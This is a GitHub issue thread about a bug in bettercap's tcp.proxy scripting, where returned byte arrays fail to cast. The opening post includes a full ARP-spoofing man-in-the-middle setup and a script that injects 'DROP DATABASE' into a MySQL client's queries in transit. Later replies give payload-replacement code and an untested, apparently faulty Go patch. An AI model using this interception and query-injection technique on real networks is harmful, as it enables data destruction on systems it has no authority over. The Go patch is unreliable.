tcp.proxy change data ,onData function return error

[ba0gu0]

Environment

• Bettercap version: bettercap v2.28 (built for linux amd64 with go1.14.4).
• OS version : Kali Linux 2020.3.
• Go version : go1.14.4.
• Command line arguments: sudo bettercap -iface eth0
• Through arp deception, modify the data of the MySQL client management database. 172.16.114.130 is the database server, 172.16.114.131 is the mysql client. 172.16.114.128 is the arp attack server.

Js Script Code:

function onData(from, to, data) {

    if (env["tcp.address"] == to){

        log('Incoming Data : ' + data)

        var result_str = '';

        for (var i = 0; i < data.length; i++ ){

            var str = String.fromCharCode(parseInt(data[i]));

            result_str += str;

        }

        result_str = result_str.replace(/select/i, "DROP DATABASE IF EXISTS Hack_By_BaoGuo;CREATE DATABASE Hack_By_BaoGuo;SELECT");

        log('Mysql Client Query SQL : ' + result_str);

        result_ascii = new Array();

        for (var i = 0; i < result_str.length; i++) {

            var ascii = result_str.charCodeAt(i);

            result_ascii.push(ascii);
        }

        log('Return Data : ' + result_ascii)

        return result_ascii;
    }
}

Steps to Reproduce

172.16.114.0/24 > 172.16.114.128  » set tcp.address 172.16.114.130
172.16.114.0/24 > 172.16.114.128  » set tcp.port 3306
172.16.114.0/24 > 172.16.114.128  » set tcp.proxy.script /home/kali/Desktop/mysql.js
172.16.114.0/24 > 172.16.114.128  » tcp.proxy on
172.16.114.0/24 > 172.16.114.128  » set arp.spoof.internal true
172.16.114.0/24 > 172.16.114.128  » set arp.spoof.targets 172.16.114.131
172.16.114.0/24 > 172.16.114.128  » arp.spoof on

172.16.114.0/24 > 172.16.114.128  » [20:02:08] [sys.log] [inf] Incoming Data : 17,0,0,0,3,115,101,108,101,99,116,32,118,101,114,115,105,111,110,40,41
172.16.114.0/24 > 172.16.114.128  » [20:02:08] [sys.log] [inf] Mysql Client Query SQL : DROP DATABASE IF EXISTS Hack_By_BaoGuo;CREATE DATABASE Hack_By_BaoGuo;SELECT version()
172.16.114.0/24 > 172.16.114.128  » [20:02:08] [sys.log] [inf] Return Data : 17,0,0,0,3,68,82,79,80,32,68,65,84,65,66,65,83,69,32,73,70,32,69,88,73,83,84,83,32,72,97,99,107,95,66,121,95,66,97,111,71,117,111,59,67,82,69,65,84,69,32,68,65,84,65,66,65,83,69,32,72,97,99,107,95,66,121,95,66,97,111,71,117,111,59,83,69,76,69,67,84,32,118,101,114,115,105,111,110,40,41
172.16.114.0/24 > 172.16.114.128  » [20:02:08] [sys.log] [err] error while casting exported value to array of byte: value = [17 0 0 0 3 68 82 79 80 32 68 65 84 65 66 65 83 69 32 73 70 32 69 88 73 83 84 83 32 72 97 99 107 95 66 121 95 66 97 111 71 117 111 59 67 82 69 65 84 69 32 68 65 84 65 66 65 83 69 32 72 97 99 107 95 66 121 95 66 97 111 71 117 111 59 83 69 76 69 67 84 32 118 101 114 115 105 111 110 40 41]
172.16.114.0/24 > 172.16.114.128  » [20:02:34] [sys.log] [inf] Incoming Data : 12,0,0,0,3,115,104,111,119,32,116,97,98,108,101,115
172.16.114.0/24 > 172.16.114.128  » [20:02:34] [sys.log] [inf] Mysql Client Query SQL : 
                                                                                        show tables
172.16.114.0/24 > 172.16.114.128  » [20:02:34] [sys.log] [inf] Return Data : 12,0,0,0,3,115,104,111,119,32,116,97,98,108,101,115
172.16.114.0/24 > 172.16.114.128  » [20:02:34] [sys.log] [err] error while casting exported value to array of byte: value = [12 0 0 0 3 115 104 111 119 32 116 97 98 108 101 115]
172.16.114.0/24 > 172.16.114.128  » 

Expected behavior:

• Can't return data correctly ? But I directly return the passed data parameter, it can run normally.

Actual behavior:

• error while casting exported value to array of byte: value = [12 0 0 0 3 115 104 111 119 32 116 97 98 108 101 115]

--

[llbarbosas]

Same here. Did you find any workaround?

[SheilaLundin]

Same issue.
version: v2.31.1
module: tcp-proxy

// called when the script is loaded
function onLoad() {}

// called when data is available
// return an array of bytes to override "data"
function onData(from, to, data) {
       return [31, 32, 33];
}

[sys.log] [err] error while casting exported value to array of byte: value = [31 32 33]

[mmiszczyk]

The cause of the problem seems to be that 'data' isn't really a Javascript array. Try this:

function onData(from, to, data) {
  var b = [31,32,33]
  log_info(typeof(data))
  log_info(Object.getOwnPropertyNames(data))
  log_info(typeof(b))
  log_info(Object.getOwnPropertyNames(b))

On my machine, output is:

2021-08-11 11:49:16 inf object
2021-08-11 11:49:16 inf 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58
2021-08-11 11:49:16 inf object
2021-08-11 11:49:16 inf length,0,1,2

As you can see, the data variable does not have the 'length' attribute. Unfortunately, simply removing it from an array doesn't fix our problem, and Bettercap is still not able to complete the cast. I'm not sure why is it, I don't know enough about Bettercap, Go or Otto to identify the root cause. But I think that the first step to solve this would be to find out what exactly is data, and how to create it. In the meantime, I'll stick to modifying the data object directly instead of creating a new one.

[mmiszczyk]

[31, 32, 33] is []int64

// called when the script is loaded
function onLoad() {}

// called when data is available
// return an array of bytes to override "data"
function onData(from, to, data) {
       return new Uint8Array([31, 32, 33]);
}

I tried and got this error:
192.168.1.0/24 > 192.168.1.33 » [12:07:57] [sys.log] [err] error while executing onData callback: ReferenceError: 'Uint8Array' is not defined

[SheilaLundin]

Can't change the length of 'data', can't replace a shorter bytes by a longer one.

[lwierzbicki]

You cannot change length of data, because it ends as malformed TCP packet (or rather internal error, because that is not sent anywhere). This means you need to return the same length of data. And as it was said previously, the best way is to edit existing data variable.
Some additional notes:

• data is an array of "integers". "Integer" can have value from 0 to 255 (it is decimal representation of hex).
• meaningful data usually does not start at data[0]
• converting and presenting data as string usually ends with characters loss (and ends with error of incorrect length of returned data).

I think good addition to documentation would be a working example which change data.

[evilsocket]

As @lwierzbicki mentioned, data must be changed inplace and must retain the same length otherwise the packet will be broken. closing for inactivity

[LucasParsy]

Necro-posting to correct the last message: you can add new bytes to the packet, and return data that is same length or bigger than the original one.
I did like this:

function onData(from, to, data) {
  payload = "hello this is my new replaced payload"

  for (i = 0; i < payload.length; i++) {
    data[i] = payload.charCodeAt(i);
  }
    return data;
}

however I would advise on re-opening this issue, as you still can't create payloads smaller than the original one.

A "Chat-GPT" solution (I don't do Go, deal with it's corectness ^^' ) would be replacing this line:

bettercap/modules/tcp_proxy/tcp_proxy_script.go

Line 58 in 453c417

array, ok := ret.([]byte)

with

array, ok := ret.([]byte)
  if !ok {
    jsArray, err := convertOttoValueToBytes(ret)
    if err != nil {
        log.Error("error while casting exported value to array of byte: value =  %+v, reason = %s", ret, err)
        return nil
    }
    return jsArray
}
return array
...


func convertOttoValueToBytes(value otto.Value) ([]byte, error) {
    exported, err := value.Export()
    if err != nil {
        return nil, fmt.Sprintf("failed to export value from Otto: %w", err)
    }

    // Assert that we received an array
    arr, ok := exported.([]interface{})
    if !ok {
        return nil, "expected a JavaScript array"
    }

    result := make([]byte, len(arr))
    for i, v := range arr {
        num, ok := v.(float64)
        // or float32, or int64/int32, to check, depends of Otto lib
        if !ok {
            return nil, fmt.Sprintf("array element at index %d is not a number", i)
        }

        // Optional: Check if number is in byte range
        if num < 0 || num > 255 {
            return nil, fmt.Sprintf("array element at index %d is out of byte range: %f", i, num)
        }

        result[i] = byte(num)
    }

    return result, nil
}

with this, you can , in the JS callback, return the original data or an Int array like this:

function onData(from, to, data) {
    st_data = String(data);
    return [0,1,2,3];
}

Moreover this behavior is absolutely not documented elsewhere. (I literally re-investigated everything on this thread before stumbling on it)
Please add documentation on
https://github.com/bettercap/website/edit/master/src/content/docs/modules/ethernet/proxies/tcp.proxy.md

[evilsocket]

My previous statement is wrong, it was referred to the packet proxy module, which I confused for this one, reopening.